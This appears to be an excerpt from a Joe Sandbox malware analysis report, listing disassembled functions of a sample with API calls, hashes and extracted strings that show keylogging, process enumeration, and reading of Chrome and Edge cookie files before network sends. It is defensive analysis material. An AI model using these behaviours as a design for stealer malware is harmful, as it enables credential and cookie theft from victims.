                                                                                                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                                                Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                                                                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                                                • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                                                                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                                                Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4269425633-0
                                                                                                                                                • Opcode ID: 73b334f8cf36ed71725f842c358092b271b71775af86fb3c9ec045b7f77a6464
                                                                                                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                                • Opcode Fuzzy Hash: 73b334f8cf36ed71725f842c358092b271b71775af86fb3c9ec045b7f77a6464
                                                                                                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                                Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                                Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                                • _free.LIBCMT ref: 0044F43F
                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                                                                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                                • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                                                                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                                Function 0041C482 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1852769593-0
                                                                                                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                                Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 00450A54
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • _free.LIBCMT ref: 00450A66
                                                                                                                                                • _free.LIBCMT ref: 00450A78
                                                                                                                                                • _free.LIBCMT ref: 00450A8A
                                                                                                                                                • _free.LIBCMT ref: 00450A9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                                Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 00444106
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • _free.LIBCMT ref: 00444118
                                                                                                                                                • _free.LIBCMT ref: 0044412B
                                                                                                                                                • _free.LIBCMT ref: 0044413C
                                                                                                                                                • _free.LIBCMT ref: 0044414D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                                Function 0044BAB7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 0-263838557
                                                                                                                                                • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                                                                                                                • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                                                                                                                                • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                                                                                                                • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                                                                                                                                Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountEventTick
                                                                                                                                                • String ID: !D@$NG
                                                                                                                                                • API String ID: 180926312-2721294649
                                                                                                                                                • Opcode ID: 9995513762a4fd8edc495be866afed25eb4c32c1f3911c48c384adcc3b5f66be
                                                                                                                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                                                • Opcode Fuzzy Hash: 9995513762a4fd8edc495be866afed25eb4c32c1f3911c48c384adcc3b5f66be
                                                                                                                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                                                                Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                                • String ID: XQG$NG$PG
                                                                                                                                                • API String ID: 1634807452-3565412412
                                                                                                                                                • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                                                                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                                                • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                                                                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                                                                Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LdSbZG1iH6.exe,00000104), ref: 00443515
                                                                                                                                                • _free.LIBCMT ref: 004435E0
                                                                                                                                                • _free.LIBCMT ref: 004435EA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                • String ID: C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                                • API String ID: 2506810119-2717834789
                                                                                                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                                Function 0044B89F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                                                                                                                • GetLastError.KERNEL32 ref: 0044B9B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 2456169464-263838557
                                                                                                                                                • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                                                                                                                • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                                                                                                                • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                                                                                                                • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                                                                                                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                • API String ID: 368326130-3219657780
                                                                                                                                                • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                                                                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                                                • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                                                                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                                                                Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 00416330
                                                                                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                                                                  • Part of subcall function 004138B2: RegCloseKey.KERNELBASE(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$CloseCreateValue
                                                                                                                                                • String ID: !D@$okmode$PG
                                                                                                                                                • API String ID: 3411444782-3370592832
                                                                                                                                                • Opcode ID: daa606be5f890dd41bf4520ea31fc1fcd77c876229317bee2e8551f29a719760
                                                                                                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                                                                • Opcode Fuzzy Hash: daa606be5f890dd41bf4520ea31fc1fcd77c876229317bee2e8551f29a719760
                                                                                                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                                                                Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                                                                                Strings
                                                                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                • API String ID: 1174141254-1980882731
                                                                                                                                                • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                                                                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                                                • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                                                                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                                                Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                                                                                Strings
                                                                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                • API String ID: 1174141254-1980882731
                                                                                                                                                • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                                                                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                                                • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                                                                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                                                                Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                                                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                • String ID: Offline Keylogger Started
                                                                                                                                                • API String ID: 465354869-4114347211
                                                                                                                                                • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                                                                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                                • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                                                                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                                Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
